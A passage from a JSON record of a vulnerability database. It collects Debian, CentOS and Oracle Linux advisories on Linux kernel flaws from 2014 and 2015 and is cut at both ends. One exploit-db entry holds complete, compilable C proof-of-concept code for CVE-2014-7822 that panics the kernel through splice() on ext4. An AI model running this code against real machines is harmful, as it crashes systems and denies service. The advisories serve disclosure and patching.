As a result, both seccomp and audit will\n misinterpret the following system call by the task(s), possibly\n leading to a violation of security policy.\n\nCVE-2015-2922\n\n Modio AB discovered that the IPv6 subsystem would process a router\n advertisement that specifies no route but only a hop limit, which\n would then be applied to the interface that received it. This can\n result in loss of IPv6 connectivity beyond the local network.\n\n This may be mitigated by disabling processing of IPv6 router\n advertisements if they are not needed:\n sysctl net.ipv6.conf.default.accept_ra=0\n sysctl net.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\n It was found that the execve(2) system call can race with inode\n attribute changes made by chown(2). Although chown(2) clears the\n setuid/setgid bits of a file if it changes the respective owner ID,\n this race condition could result in execve(2) setting effective\n uid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167 which\nwill be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\n-- \nBen Hutchings - Debian developer, member of Linux kernel and LTS teams\n\n\n", "edition": 7, "modified": "2015-06-17T19:07:21", "published": "2015-06-17T19:07:21", "id": "DEBIAN:DLA-246-2:ABC0D", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00012.html", "title": "[SECURITY] [DLA 246-2] linux-2.6 regression update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:10", 
"bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3160-1 security@debian.org\nhttp://www.debian.org/security/ Ben Hutchings\nFebruary 23, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2013-7421 CVE-2014-7822 CVE-2014-8160 CVE-2014-8559 \n CVE-2014-9585 CVE-2014-9644 CVE-2014-9683 CVE-2015-0239\n CVE-2015-1420 CVE-2015-1421 CVE-2015-1593\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\nCVE-2013-7421 / CVE-2014-9644\n\n It was discovered that the Crypto API allowed unprivileged users\n to load arbitrary kernel modules. A local user can use this flaw\n to exploit vulnerabilities in modules that would not normally be\n loaded.\n\nCVE-2014-7822\n\n Akira Fujita found that the splice() system call did not validate\n the given file offset and length. 
A local unprivileged user can use\n this flaw to cause filesystem corruption on ext4 filesystems, or\n possibly other effects.\n\nCVE-2014-8160\n\n Florian Westphal discovered that a netfilter (iptables/ip6tables) rule\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\n port/endpoint could result in incorrect connection tracking state.\n If only the generic connection tracking module (nf_conntrack) was\n loaded, and not the protocol-specific connection tracking module,\n this would allow access to any port/endpoint of the specified\n protocol.\n\nCVE-2014-8559\n\n It was found that kernel functions that iterate over a directory\n tree can dead-lock or live-lock in case some of the directory\n entries were recently deleted or dropped from the cache. A local\n unprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\n\n Andy Lutomirski discovered that address randomisation for the vDSO\n in 64-bit processes is extremely biased. A local unprivileged user\n could potentially use this flaw to bypass the ASLR protection\n mechanism.\n\nCVE-2014-9683\n\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\n the allocated buffer during encrypted filename decoding, resulting\n in local denial of service.\n\nCVE-2015-0239\n\n It was found that KVM did not correctly emulate the x86 SYSENTER\n instruction. An unprivileged user within a guest system that has\n not enabled SYSENTER, for example because the emulated CPU vendor\n is AMD, could potentially use this flaw to cause a denial of\n service or privilege escalation in that guest.\n\nCVE-2015-1420\n\n It was discovered that the open_by_handle_at() system call reads\n the handle size from user memory a second time after validating\n it. 
A local user with the CAP_DAC_READ_SEARCH capability could use\n this flaw for privilege escalation.\n\nCVE-2015-1421\n\n It was found that the SCTP implementation could free an\n authentication state while it was still in use, resulting in heap\n corruption. This could allow remote users to cause a denial of\n service or privilege escalation.\n\nCVE-2015-1593\n\n It was found that address randomisation for the initial stack in\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\n A local unprivileged user could potentially use this flaw to\n bypass the ASLR protection mechanism.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.65-1+deb7u2. Additionally this update fixes regressions\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2015-02-23T17:43:08", "published": "2015-02-23T17:43:08", "id": "DEBIAN:DSA-3170-1:F6570", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00056.html", "title": "[SECURITY] [DSA 3170-1] linux security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:15:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-8134", "CVE-2014-9420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-9584", "CVE-2013-6885", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9585"], "description": "Package : linux-2.6\nVersion : 
2.6.32-48squeeze11\nCVE ID : CVE-2013-6885 CVE-2014-7822 CVE-2014-8133 CVE-2014-8134 \n CVE-2014-8160 CVE-2014-9420 CVE-2014-9584 CVE-2014-9585\n\t\t CVE-2015-1421 CVE-2015-1593\n\nThis update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is\nnow unlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\n It was discovered that under specific circumstances, a combination\n of write operations to write-combined memory and locked CPU\n instructions may cause a core hang on AMD 16h 00h through 0Fh\n processors. A local user can use this flaw to mount a denial of\n service (system hang) via a crafted application.\n\n For more information please refer to the AMD CPU erratum 793 in\n http://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.pdf\n\nCVE-2014-7822\n\n It was found that the splice() system call did not validate the\n given file offset and length. A local unprivileged user can use\n this flaw to cause filesystem corruption on ext4 filesystems, or\n possibly other effects.\n\nCVE-2014-8133\n\n It was found that the espfix functionality can be bypassed by\n installing a 16-bit RW data segment into GDT instead of LDT (which\n espfix checks for) and using it for stack. A local unprivileged user\n could potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\n It was found that the espfix functionality is wrongly disabled in\n a 32-bit KVM guest. 
A local unprivileged user could potentially\n use this flaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\n It was found that a netfilter (iptables or ip6tables) rule\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\n port/endpoint could result in incorrect connection tracking state.\n If only the generic connection tracking module (nf_conntrack) was\n loaded, and not the protocol-specific connection tracking module,\n this would allow access to any port/endpoint of the specified\n protocol.\n\nCVE-2014-9420\n\n It was found that the ISO-9660 filesystem implementation (isofs)\n follows arbitrarily long chains, including loops, of Continuation\n Entries (CEs). This allows local users to mount a denial of\n service via a crafted disc image.\n\nCVE-2014-9584\n\n It was found that the ISO-9660 filesystem implementation (isofs)\n does not validate a length value in the Extensions Reference (ER)\n System Use Field, which allows local users to obtain sensitive\n information from kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\n It was discovered that address randomisation for the vDSO in\n 64-bit processes is extremely biassed. A local unprivileged user\n could potentially use this flaw to bypass the ASLR protection\n mechanism.\n\nCVE-2015-1421\n\n It was found that the SCTP implementation could free\n authentication state while it was still in use, resulting in heap\n corruption. 
This could allow remote users to cause a denial of\n service or privilege escalation.\n\nCVE-2015-1593\n\n It was found that address randomisation for the initial stack in\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\n A local unprivileged user could potentially use this flaw to\n bypass the ASLR protection mechanism.\n\n\n-- \nBen Hutchings - Debian developer, kernel team member\n", "edition": 7, "modified": "2015-02-18T23:22:33", "published": "2015-02-18T23:22:33", "id": "DEBIAN:DLA-155-1:5E8B0", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00009.html", "title": "[SECURITY] [DLA 155-1] linux-2.6 security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3160-1 security@debian.org\r\nhttp://www.debian.org/security/ Ben Hutchings\r\nFebruary 23, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : linux\r\nCVE ID : CVE-2013-7421 CVE-2014-7822 CVE-2014-8160 CVE-2014-8559 \r\n CVE-2014-9585 CVE-2014-9644 CVE-2014-9683 CVE-2015-0239\r\n CVE-2015-1420 CVE-2015-1421 CVE-2015-1593\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that\r\nmay lead to a denial of service, information leaks or privilege\r\nescalation.\r\n\r\nCVE-2013-7421 / CVE-2014-9644\r\n\r\n It was discovered that the Crypto API allowed unprivileged users\r\n to load arbitrary kernel modules. 
A local user can use this flaw\r\n to exploit vulnerabilities in modules that would not normally be\r\n loaded.\r\n\r\nCVE-2014-7822\r\n\r\n Akira Fujita found that the splice() system call did not validate\r\n the given file offset and length. A local unprivileged user can use\r\n this flaw to cause filesystem corruption on ext4 filesystems, or\r\n possibly other effects.\r\n\r\nCVE-2014-8160\r\n\r\n Florian Westphal discovered that a netfilter (iptables/ip6tables) rule\r\n accepting packets to a specific SCTP, DCCP, GRE or UDPlite\r\n port/endpoint could result in incorrect connection tracking state.\r\n If only the generic connection tracking module (nf_conntrack) was\r\n loaded, and not the protocol-specific connection tracking module,\r\n this would allow access to any port/endpoint of the specified\r\n protocol.\r\n\r\nCVE-2014-8559\r\n\r\n It was found that kernel functions that iterate over a directory\r\n tree can dead-lock or live-lock in case some of the directory\r\n entries were recently deleted or dropped from the cache. A local\r\n unprivileged user can use this flaw for denial of service.\r\n\r\nCVE-2014-9585\r\n\r\n Andy Lutomirski discovered that address randomisation for the vDSO\r\n in 64-bit processes is extremely biased. A local unprivileged user\r\n could potentially use this flaw to bypass the ASLR protection\r\n mechanism.\r\n\r\nCVE-2014-9683\r\n\r\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\r\n the allocated buffer during encrypted filename decoding, resulting\r\n in local denial of service.\r\n\r\nCVE-2015-0239\r\n\r\n It was found that KVM did not correctly emulate the x86 SYSENTER\r\n instruction. 
An unprivileged user within a guest system that has\r\n not enabled SYSENTER, for example because the emulated CPU vendor\r\n is AMD, could potentially use this flaw to cause a denial of\r\n service or privilege escalation in that guest.\r\n\r\nCVE-2015-1420\r\n\r\n It was discovered that the open_by_handle_at() system call reads\r\n the handle size from user memory a second time after validating\r\n it. A local user with the CAP_DAC_READ_SEARCH capability could use\r\n this flaw for privilege escalation.\r\n\r\nCVE-2015-1421\r\n\r\n It was found that the SCTP implementation could free an\r\n authentication state while it was still in use, resulting in heap\r\n corruption. This could allow remote users to cause a denial of\r\n service or privilege escalation.\r\n\r\nCVE-2015-1593\r\n\r\n It was found that address randomisation for the initial stack in\r\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\r\n A local unprivileged user could potentially use this flaw to\r\n bypass the ASLR protection mechanism.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 3.2.65-1+deb7u2. 
Additionally this update fixes regressions\r\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\r\n\r\nFor the upcoming stable distribution (jessie), these problems will be fixed\r\nsoon (a subset is fixed already).\r\n\r\nFor the unstable distribution (sid), these problems will be fixed soon\r\n(a subset is fixed already).\r\n\r\nWe recommend that you upgrade your linux packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n", "edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:DOC:31766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31766", "title": "[SECURITY] [DSA 3170-1] linux security update", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9644", 
"CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-8159", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9584", "CVE-2014-9683", "CVE-2014-9585"], "description": "DoS, information disclosure, privilege escalation.", "edition": 1, "modified": "2015-03-15T00:00:00", "published": "2015-03-15T00:00:00", "id": "SECURITYVULNS:VULN:14292", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14292", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T04:14:16", "description": "Linux Kernel splice() System Call - Local DoS. CVE-2014-7822. Dos exploit for linux platform", "published": "2015-04-13T00:00:00", "type": "exploitdb", "title": "Linux Kernel splice System Call - Local DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7822"], "modified": "2015-04-13T00:00:00", "id": "EDB-ID:36743", "href": "https://www.exploit-db.com/exploits/36743/", "sourceData": "/* ----------------------------------------------------------------------------------------------------\r\n * cve-2014-7822_poc.c\r\n * \r\n * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file\r\n * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, \r\n * as demonstrated by use of a file descriptor associated with an ext4 filesystem. \r\n *\r\n * \r\n * This is a POC to reproduce vulnerability. 
No exploitation here, just simple kernel panic.\r\n * Works on ext4 filesystem\r\n * Tested on Ubuntu with 3.13 and 3.14 kernels\r\n * \r\n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c \r\n * \r\n * \r\n * Emeric Nasi - www.sevagas.com\r\n *-----------------------------------------------------------------------------------------------------*/\r\n\r\n\r\n/* ----------------------- Includes ----------------------------*/\r\n\r\n#define _GNU_SOURCE\r\n#include <fcntl.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <limits.h>\r\n\r\n#define EXPLOIT_NAME \"cve-2014-7822\"\r\n#define EXPLOIT_TYPE DOS\r\n\r\n#define JUNK_SIZE 30000\r\n\r\n/* ----------------------- functions ----------------------------*/\r\n\r\n\r\n/* Useful:\r\n * \r\n+============+===============================+===============================+\r\n| \\ File flag| | |\r\n| \\ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |\r\n|Fs Features\\| | |\r\n+------------+-------------------------------+-------------------------------+\r\n| !extent | write: 2194719883264 | write: -------------- |\r\n| | seek: 2199023251456 | seek: -------------- |\r\n+------------+-------------------------------+-------------------------------+\r\n| extent | write: 4402345721856 | write: 17592186044415 |\r\n| | seek: 17592186044415 | seek: 17592186044415 |\r\n+------------+-------------------------------+-------------------------------+\r\n*/\r\n\r\n\r\n/**\r\n * Poc for cve_2014_7822 vulnerability\r\n */\r\nint main()\r\n{\r\n int pipefd[2];\r\n int result;\r\n int in_file;\r\n int out_file;\r\n int zulHandler;\r\n loff_t viciousOffset = 0;\r\n \r\n char junk[JUNK_SIZE] ={0};\r\n \r\n result = pipe(pipefd);\r\n \r\n // Create and clear zug.txt and zul.txt files\r\n system(\"cat /dev/null > zul.txt\");\r\n system(\"cat /dev/null > zug.txt\");\r\n \r\n // Fill zul.txt with A\r\n zulHandler = open(\"zul.txt\", 
O_RDWR);\r\n memset(junk,'A',JUNK_SIZE);\r\n write(zulHandler, junk, JUNK_SIZE);\r\n close(zulHandler);\r\n\r\n //put content of zul.txt in pipe\r\n viciousOffset = 0;\r\n in_file = open(\"zul.txt\", O_RDONLY);\r\n result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);\r\n close(in_file);\r\n \r\n\r\n // Put content of pipe in zug.txt\r\n out_file = open(\"zug.txt\", O_RDWR); \r\n viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!\r\n printf(\"[cve_2014_7822]: ViciousOffset = %lu\\n\", (unsigned long)viciousOffset);\r\n \r\n result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615\r\n if (result == -1)\r\n {\r\n printf(\"[cve_2014_7822 error]: %d - %s\\n\", errno, strerror(errno));\r\n exit(1);\r\n }\r\n close(out_file);\r\n\r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n \r\n //Open zug.txt \r\n in_file = open(\"zug.txt\", O_RDONLY);\r\n close(in_file);\r\n \r\n printf(\"[cve_2014_7822]: POC triggered, ... system will panic after some time\\n\");\r\n \r\n return 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36743/"}], "centos": [{"lastseen": "2019-12-20T18:26:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0164\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. 
(CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n* Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n* Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n* Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an \"Invalid argument\"\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-February/032970.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0164.html", "edition": 3, "modified": "2015-02-11T05:47:40", "published": "2015-02-11T05:47:40", "href": "http://lists.centos.org/pipermail/centos-announce/2015-February/032970.html", "id": "CESA-2015:0164", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:54", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2014-8159"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0726\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. 
(CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* In certain systems with multiple CPUs, when a crash was triggered on one\nCPU with an interrupt handler and this CPU sent Non-Maskable Interrupt\n(NMI) to another CPU, and, at the same time, ioapic_lock had already been\nacquired, a deadlock occurred in ioapic_lock. As a consequence, the kdump\nservice could become unresponsive. This bug has been fixed and kdump now\nworks as expected. (BZ#1197742)\n\n* On Lenovo X1 Carbon 3rd Gen, X250, and T550 laptops, the thinkpad_acpi\nmodule was not properly loaded, and thus the function keys and radio\nswitches did not work. This update applies a new string pattern of BIOS\nversion, which fixes this bug, and function keys and radio switches now\nwork as intended. (BZ#1197743)\n\n* During a heavy file system load involving many worker threads, all worker\nthreads in the pool became blocked on a resource, and no manager thread\nexisted to create more workers. As a consequence, the running processes\nbecame unresponsive. With this update, the logic around manager creation\nhas been changed to assure that the last worker thread becomes a manager\nthread and does not start executing work items. Now, a manager thread\nexists, spawns new workers as needed, and processes no longer hang.\n(BZ#1197744)\n\n* If a thin-pool's metadata enters read-only or fail mode, for example, due\nto thin-pool running out of metadata or data space, any attempt to make\nmetadata changes such as creating a thin device or snapshot thin device\nshould error out cleanly. However, previously, the kernel code returned\nverbose and alarming error messages to the user. With this update, due to\nearly trapping of attempt to make metadata changes, informative errors are\ndisplayed, no longer unnecessarily alarming the user. 
(BZ#1197745)\n\n* When running Red Hat Enterprise Linux as a guest on Microsoft Hyper-V\nhypervisor, the storvsc module did not return the correct error code for\nthe upper level Small Computer System Interface (SCSI) subsystem. As a\nconsequence, a SCSI command failed and storvsc did not handle such a\nfailure properly under some conditions, for example, when RAID devices were\ncreated on top of storvsc devices. An upstream patch has been applied to\nfix this bug, and storvsc now returns the correct error code in the\ndescribed situation. (BZ#1197749)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-April/033062.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0726.html", "edition": 4, "modified": "2015-04-01T03:22:51", "published": "2015-04-01T03:22:51", "href": "http://lists.centos.org/pipermail/centos-announce/2015-April/033062.html", "id": "CESA-2015:0726", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-30T19:22:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "kernel\n[2.6.18-402.0.0.0.1]\n- [net] fix tcp_trim_head() (James Li) [orabug 14512145, 19219078]\n- ocfs2: dlm: fix recovery hung (Junxiao Bi) [orabug 13956772]\n- i386: fix MTRR code (Zhenzhong Duan) [orabug 15862649]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, 
x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under 
memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix refcount bug in endpoint removal (Junxiao Bi) [orabug 14795203]", "edition": 6, "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "ELSA-2015-0164-1", "href": "http://linux.oracle.com/errata/ELSA-2015-0164-1.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "kernel-uek\n[2.6.32-400.37.3]\n- net: sctp: fix slab corruption from use after free on INIT collisions (Daniel Borkmann) [Orabug: 20780349] {CVE-2015-1421}", "edition": 4, "modified": "2015-03-31T00:00:00", "published": "2015-03-31T00:00:00", "id": "ELSA-2015-3021", "href": "http://linux.oracle.com/errata/ELSA-2015-3021.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-9322"], "description": "kernel\n[2.6.18-402]\n- [block] virtio: Reset device after blk_cleanup_queue() (Stefan Hajnoczi) [1006536]\n- [block] virtio: Call del_gendisk() before disable guest kick (Stefan Hajnoczi) [1006536]\n- [block] virtio: Drop unused request tracking list (Stefan Hajnoczi) [1006536]\n- [fs] cifs: setfacl removes part of ACL when setting POSIX ACLs (Sachin 
